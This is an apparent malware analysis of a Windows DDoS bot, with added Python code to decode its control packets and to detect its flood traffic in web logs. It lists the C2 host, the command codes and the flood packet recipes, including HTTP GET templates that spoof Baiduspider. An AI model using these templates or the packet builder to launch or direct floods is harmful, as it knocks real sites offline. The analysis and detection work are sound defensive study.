A DDoS sample under Windows.
Loader
After the program runs, it drops a file named 256_res.tmp in the TEMP directory.
The file is then moved to the System32 directory and renamed Rasmedia.dll.
The original file is deleted.
The loader then loads the dropped DLL and calls the install function it exports.
Rasmedia.dll
The install function registers the DLL as a service named WINHELP32.
The details are as follows:
After the service runs, two threads are started.
One thread communicates with the remote server.
The other copies the DLL image into memory and, whenever it finds that the image file on disk has been deleted, writes it out again.
This implements a loop-based write protection: the file restores itself after deletion.
The thread that communicates with the remote server does most of its work in the function startaddress.
The function first decrypts the remote server address, fabao.309420.com:7002, which resolves to the IP 61.147.107.79, an address in Yangzhou, Jiangsu province.
After collecting the current system information, the function encrypts it and sends it to the remote server.
The encryption algorithm, recovered from the binary, is as follows:
The packet sent, shown below, is 96 bytes in total.
Next, the bot receives the remote server's control packet.
Its data structure is as follows:
command is the remote control command.
Accack is the packet length and is also used to decide which attack to run.
Target_url is the URL of the attack target.
Port is the port of the attack target.
Attack_message is a custom attack data payload.
The command field supports commands such as remote command execution and file download, but the main function is clearly DDoS.
Here 0x41000001, 0x32000004, 0x32000001 and 0x31000005 are compound instructions: on receiving one of them, the bot ("broiler", the zombie machine) runs several types of DDoS attack against the target at once. Each of the remaining DDoS instructions corresponds to a single attack type.
The returned packet received here is 228 bytes in total and is still encrypted at this point.
Decrypting it with the following function shows that the decrypted data begins with 32000020, which is a DDoS command.
Continuing the decryption, the Target_url field reveals the attack target of this command: http://code.moquta.com.
The DDoS attack strategy provides multiple attack modes. 32000020, for example, is a DDoS attack via HTTP GET requests whose template is already written into the code, as follows; only the Target, Host and Referer are filled in.
This mode uses the Port field at offset 208 of V1, which defaults to 80.
Here is our returned packet, offset by 0x50 (the extra zeros are an artifact of the decryption script).
The attack packet is sent here.
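To make the control-packet layout described above concrete, here is an added Python decoder; it is not code from the original analysis. It assumes the packet has already been decrypted and that the 4-byte command sits at offset 0 (the decrypted data begins with 32000020). The Port field at offset 208 and Attack_message at bytes 212..228 come from the text; placing Accack at offset 4 and Target_url as a NUL-terminated string from offset 8, and treating a zero port as the default 80, are my assumptions. The command table reuses the codes and function labels from the attack list, and the sample packet is constructed, not captured.

```python
import struct

PACKET_LEN = 228            # size of the returned control packet in the write-up
PORT_OFFSET = 208           # Port field offset (V1 + 208) from the write-up
MESSAGE_START, MESSAGE_END = 212, 228   # Attack_message = command_package[212,228]
TARGET_OFFSET = 8           # ASSUMPTION: the page does not give Target_url's position

# Command codes and analyst function labels from the attack list in the write-up.
DDOS_COMMANDS = {
    0x32000020: "HTTP GET flood, template filled with Target/Host/Referer",
    0x31000001: "Fun_createthread_sockrandipsend",
    0x31000002: "Fun_createthread_sockheapsendto",
    0x41000001: "Fun_createthread_sockrandtentimesendto",
    0x31000005: "Fun_createthread_sockrandsend",
    0x37000001: "Fun_createthread_sockendcontainsend",
    0x33000001: "Fun_creathethread_sockrandwithcountsend",
    0x31000003: "Fun_callback_sockrandthousandtimesendto",
    0x32000004: "Fun_createthread_socksend_withoutref_httpone",
    0x32000001: "Fun_createthread_socksend_withoutref_httptwo (also listed for onlyhost_http)",
    0x36000001: "Fun_createthread_socksend_withref_httpone",
    0x32000002: "Fun_createthread_socksend_withref_httptwo",
}
# Compound instructions: one of these starts several attack types at once.
COMPOUND_COMMANDS = {0x41000001, 0x32000004, 0x32000001, 0x31000005}


def parse_control_packet(pkt: bytes) -> dict:
    """Decode one decrypted 228-byte control packet into its fields.

    Assumed layout (only the command at offset 0, Port at 208 and
    Attack_message at 212..228 are stated in the write-up):
      0    u32 command
      4    u32 Accack (packet length / attack selector)      ASSUMPTION
      8    NUL-terminated Target_url                         ASSUMPTION
      208  u32 Port (0 treated as the default, 80)           ASSUMPTION on the default
      212  16 bytes Attack_message
    """
    if len(pkt) != PACKET_LEN:
        raise ValueError(f"expected {PACKET_LEN} bytes, got {len(pkt)}")
    command, accack = struct.unpack_from("<II", pkt, 0)
    raw_target = pkt[TARGET_OFFSET:PORT_OFFSET].split(b"\x00", 1)[0]
    (port,) = struct.unpack_from("<I", pkt, PORT_OFFSET)
    return {
        "command": command,
        "accack": accack,
        "target_url": raw_target.decode("ascii", errors="replace"),
        "port": port or 80,
        "attack_message": pkt[MESSAGE_START:MESSAGE_END],
        "is_ddos": command in DDOS_COMMANDS,
        "mode": DDOS_COMMANDS.get(command, "non-DDoS or unknown command"),
        "compound": command in COMPOUND_COMMANDS,
    }


def make_sample_packet(command: int, target_url: str, port: int = 0,
                       attack_message: bytes = b"") -> bytes:
    """Build a constructed decrypted packet in the assumed layout.

    This is a test fixture for the decoder, not a captured packet and not
    the bot's own encoder.
    """
    body = bytearray(PACKET_LEN)
    struct.pack_into("<II", body, 0, command, PACKET_LEN)
    target = target_url.encode("ascii")
    if len(target) >= PORT_OFFSET - TARGET_OFFSET:
        raise ValueError("target_url too long for the assumed layout")
    body[TARGET_OFFSET:TARGET_OFFSET + len(target)] = target
    struct.pack_into("<I", body, PORT_OFFSET, port)
    body[MESSAGE_START:MESSAGE_END] = attack_message[:16].ljust(16, b"\x00")
    return bytes(body)


if __name__ == "__main__":
    # Mirrors the packet in the write-up: command 32000020 aimed at http://code.moquta.com.
    sample = make_sample_packet(0x32000020, "http://code.moquta.com")
    for key, value in parse_control_packet(sample).items():
        print(f"{key:15} {value!r}")
```

When a real capture of this protocol is available, only the field offsets marked as assumptions need adjusting; the command table and the compound-instruction check stay as they are.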
The attack packets of the various modes are listed below.
Rand denotes a random number generator.

0x31000001
Fun_createthread_sockrandipsend
send_package{
  generated with 5 bytes, 8 times
}
Length: 40
One turn

0x31000002
Fun_createthread_sockheapsendto
package{
  +2 count (starting from 0)
  +6 0
  +8 TickCount
} encrypted by sub_10005480
Length: 4096
One turn: 65534 packets

0x41000001
Fun_createthread_sockrandtentimesendto
send_package{
  BUF (generated by Rand(97,122))
}
Length: 30
One turn
Count % Sleep

0x31000005
Fun_createthread_sockrandsend
send_package{
  BUF ((byte) generated by Rand(0,255) << 16)
}
Length: 1024
One turn, all the time

Fun_createthread_sockconnect1
send_package{
  connect
}
One turn: one packet, then sleep

Fun_createthread_sockconnect2
send_package{
  connect
}
One turn: one packet, connect and close

0x37000001
Fun_createthread_sockendcontainsend
send_package{
  BUF (command_package[212,228])
}
Length: 16
One turn, all the time

0x33000001
Fun_creathethread_sockrandwithcountsend
send_package{
  BUF ("#%d<<<<<i@c<<<<<%s!", count, generated with Rand(65,122))
}
Length: rand(20,120)
One turn: 6500

0x31000003
Fun_callback_sockrandthousandtimesendto
send_package{
  BUF ((int)(generated with Rand(97,122) << 16) * 512 * 4)
}
Length: 2048
One turn

0x32000004
Fun_createthread_socksend_withoutref_httpone
send_package{
  port 80:
  'GET%s?=%d http/1.1'
  'User-agent:mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
  'Host:%s'
  'Cache-control:no-cache'
  'Mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
  'GET%s?=%d http/1.1'
  'User-agent:mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
  'Host:%s:%d'
  'Cache-control:no-cache'
}
Length: buff
One turn, all the time

0x32000001
Fun_createthread_socksend_withoutref_httptwo
send_package{
  port 80:
  'get/http/1.1'
  'Host:%s'
  'User-agent:mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
  'Cache-control:no-cache'
  'Connection:close'
  other ports:
  'get/http/1.1'
  'Host:%s:%d'
  'User-agent:mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
  'Cache-control:no-cache'
  'Connection:close'
} without_referer
Length: buff
One turn, all the time

0x32000001
Fun_createthread_socksend_onlyhost_http
send_package{
  port 80:
  'get/http/1.1'
  'Host:%s'
  other ports:
  'get/http/1.1'
  'Host:%s:%d'
}
Length: buf
One turn, all the time

0x36000001
Fun_createthread_socksend_withref_httpone
send_package{
  port 80:
  'GET%s http/1.1'
  'Host:%s'
  'User-agent:mozilla/5.0+ (compatible;+baiduspider/2.0;++http://www.baidu.com/search/spider.html)'
  'Cache-control:no-store, Must-revalidate'
  'referer:http://%s'
  'Connection:close'
  other ports:
  'GET%s http/1.1'
  'Host:%s:%d'
  'User-agent:mozilla/5.0+ (compatible;+baiduspider/2.0;++http://www.baidu.com/search/spider.html)'
  'Cache-control:no-store, Must-revalidate'
  'referer:http://%s'
  'Connection:close'
}
Length: buff
One turn, all the time

0x32000002
Fun_createthread_socksend_withref_httptwo
send_package{
  port 80:
  'GET%s http/1.1'
  'Host:%s'
  'User-agent:mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
  'Cache-control:no-store, Must-revalidate'
  'referer:http://%s'
  'Connection:close'
  other ports:
  'GET%s http/1.1'
  'Host:%s:%d'
  'User-agent:mozilla/5.0 (compatible; baiduspider/2.0; +http://www.baidu.com/search/spider.html)'
  'Cache-control:no-store, Must-revalidate'
  'referer:http://%s'
  'Connection:close'
}
Length: buf
One turn, all the time
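From the defender's side, the HTTP request templates above are useful as fingerprints: a crawler really operated by Baidu does not normally send a bare "?=<number>" query, a User-Agent with its spaces replaced by plus signs, or the Cache-control values hard-coded in these templates. The following Python script is an added example, not part of the original write-up. It scores requests from a constructed tab-separated web log (fields: ip, method, path, host, user-agent, referer, cache-control; the format is my own) against those three traits plus a Referer that is exactly http://<Host>, which the withref templates suggest. The addresses are from documentation ranges and the log lines are constructed.

```python
import re
from collections import Counter

# Traits taken from the request templates in the write-up.
BAIDU_UA = "baiduspider/2.0"
PLUS_JOINED_UA = re.compile(r"mozilla/5\.0\+\s*\(compatible;\+baiduspider", re.I)
EMPTY_KEY_QUERY = re.compile(r"\?=\d+$")           # from 'GET%s?=%d http/1.1'
TEMPLATE_CACHE_CONTROL = {"no-cache", "no-store,must-revalidate"}

# Constructed log, tab-separated: ip, method, path, host, user-agent, referer, cache-control.
# The format is my own; addresses are from documentation ranges.
SAMPLE_LOG = "\n".join("\t".join(rec) for rec in [
    ("203.0.113.10", "GET", "/?=48213", "code.moquta.com",
     "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)",
     "", "no-cache"),
    ("203.0.113.11", "GET", "/", "code.moquta.com",
     "Mozilla/5.0+(compatible;+Baiduspider/2.0;++http://www.baidu.com/search/spider.html)",
     "http://code.moquta.com", "no-store, Must-revalidate"),
    ("203.0.113.12", "GET", "/", "code.moquta.com:8080",
     "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)",
     "", "no-cache"),
    ("198.51.100.5", "GET", "/robots.txt", "code.moquta.com",
     "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)",
     "", ""),
    ("198.51.100.6", "GET", "/index.html?id=7", "code.moquta.com",
     "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120",
     "http://code.moquta.com/", "max-age=0"),
])


def parse_line(line: str):
    """Split one tab-separated log line into a dict, or return None if malformed."""
    fields = line.rstrip("\r\n").split("\t")
    if len(fields) != 7:
        return None
    keys = ("ip", "method", "path", "host", "user_agent", "referer", "cache_control")
    return dict(zip(keys, fields))


def score_request(rec: dict):
    """Return (score, reasons); each reason is one template trait the request shows."""
    score, reasons = 0, []
    ua_lower = rec["user_agent"].lower()
    cache = rec["cache_control"].lower().replace(" ", "")
    if EMPTY_KEY_QUERY.search(rec["path"]):
        score += 3
        reasons.append("query '?=<number>' matches the 0x32000004 template")
    if PLUS_JOINED_UA.search(rec["user_agent"]):
        score += 3
        reasons.append("plus-joined Baiduspider UA matches the 0x36000001 template")
    if BAIDU_UA in ua_lower and cache in TEMPLATE_CACHE_CONTROL:
        score += 3
        reasons.append("Baiduspider UA sent with a template Cache-control value")
    if rec["referer"] and rec["referer"] == "http://" + rec["host"].split(":")[0]:
        score += 1
        reasons.append("Referer is exactly http://<Host>, as in the withref templates")
    return score, reasons


def hunt(lines, threshold: int = 3):
    """Score every line; return flagged (ip, score, reasons) and hit counts per source IP."""
    flagged, per_source = [], Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        score, reasons = score_request(rec)
        if score >= threshold:
            flagged.append((rec["ip"], score, reasons))
            per_source[rec["ip"]] += 1
    return flagged, per_source


if __name__ == "__main__":
    hits, sources = hunt(SAMPLE_LOG.splitlines())
    for ip, score, reasons in hits:
        print(ip, score, "; ".join(reasons))
    print("hits per source:", dict(sources))
```

The per-source counter is the part worth keeping in production: a single template-shaped request is only a hint, while hundreds of them from one address in a short window is the flood itself, so the threshold and a rate limit per source belong together.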